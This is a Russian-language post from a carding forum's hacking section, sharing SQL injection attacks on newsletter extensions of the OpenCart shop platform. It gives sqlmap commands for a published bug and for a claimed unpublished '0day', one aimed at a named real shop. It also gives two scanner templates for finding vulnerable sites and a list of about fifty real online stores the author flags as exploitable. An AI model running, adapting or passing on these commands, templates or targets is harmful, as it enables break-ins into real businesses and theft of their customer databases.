Carder.life

Carder.life (http://txgate.io:443/index.php)
-   Хакинг. Программирование (http://txgate.io:443/forumdisplay.php?f=27)
-   -   OpenCart (http://txgate.io:443/showthread.php?t=37353)

bestuser 05-01-2025 02:01 PM

И так, новый конструктивный пост на тему опенкарта:
Первый баг который был на доступах указанных в топике выше это : https://sploitus.com/exploit?id=PACKETSTORM:168412
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 82px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter
- Save request in BurpSuite
- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs</pre>
Второго бага нет в пуличных базах уязвимостей, по этому можете считать его 0day:
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 34px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">sqlmap -u "https://www.latexcatfish.com//index.php?route=extension/module/newsletters/news" --data="[email protected]*" --random-agent --batch --tamper="between" --dbs</pre>
Как водится свежий подгон от меня:
so_newletter_custom_popup.yaml
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 370px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">#/index.php?route=extension/module/so_newletter_custom_popup/newsletter
#UNIQUE ID SECTION
id: SO_NEWS_SQLi
#INFORMATION SECTION
info:
name: wow
author: mzh
severity: info
reference: *******
tags: wow
#PROTOCOL SECTION
http:
- method: GET
path:
- "{{BaseURL}}/index.php?route=extension/module/so_newletter_custom_popup/newsletter"
matchers:
- type: word
part: body
words:
- 'Email has already exist"}'</pre>
newsletters_news.yaml
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 338px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">#/index.php?route=extension/module/so_newletter_custom_popup/newsletter
#UNIQUE ID SECTION
id: NEWS_SQLi
#INFORMATION SECTION
info:
name: wow
author: mzh
tags: alfaman-loh-0day-exploit
#PROTOCOL SECTION
http:
- method: GET
path:
- "{{BaseURL}}/index.php?route=extension/module/newsletters/news"
matchers:
- type: word
part: body
words:
- '{"message":"Email Already Exist"}'</pre>
Тест лист с уязвимыми хостами:
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 498px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">[NEWS_SQLi] [http] [info] http://albumecuprestigiu.ro/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://anthinh.vn/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://anoncndin.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[SO_NEWS_SQLi] [http] [info] http://avcstorage.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://beardedfishermen.eliteclubclothing.co.uk/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://bimmerexpert.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://branchburgpoolsupplies.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://bluelogic.com.my/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://cars.autobay.pk/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://chai-sutta.biz/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://china-moto.by/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://data.net.pk/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://uneeruiqy.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://ushaagency.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.autopeach.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.bhmmasons.co.za/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.bliaudio.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.boxequipment.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.curiosityfashion.com.my/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://www.entekart.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://www.fortune-chen.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.garglabsolutions.com/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://www.guvenlikkamerasistemleri.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://www.ionbathrepair.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.jcfoods.com.hk/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.kayamachines.com/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://www.koptershop.rs/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://www.longhopeedu.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.maas-laser.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.mawiyer.com/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://www.maxatvbali.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[SO_NEWS_SQLi] [http] [info] http://www.muses.com.tw/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://www.nankang.com.hk/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.pacificgsm.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.paul-costa.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.prado.ba/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.poypet.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.pruthiprinters.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.raftis.in/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] http://www.stepbystep.com.my/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] http://www.sunbornwatches.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.tehnomax.rs/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.tehnovod.hr/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] http://www.uf-sportsgym.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] https://beautypointcy.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] https://belfoods.ro/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] https://beiho.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] https://binicilikstore.com/index.php?route=extension/module/newsletters/news
[SO_NEWS_SQLi] [http] [info] https://bikotique.com/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[SO_NEWS_SQLi] [http] [info] https://bindousr.com.kw/index.php?route=extension/module/so_newletter_custom_popup/newsletter
[NEWS_SQLi] [http] [info] https://blumat.pl/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] https://buttons-threads.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] https://buyonshops.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] https://caleyelectrical.com/index.php?route=extension/module/newsletters/news
[NEWS_SQLi] [http] [info] https://ceiling-tiles.co.uk/index.php?route=extension/module/newsletters/news</pre>
© sushifriends74


All times are GMT. The time now is 10:10 AM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.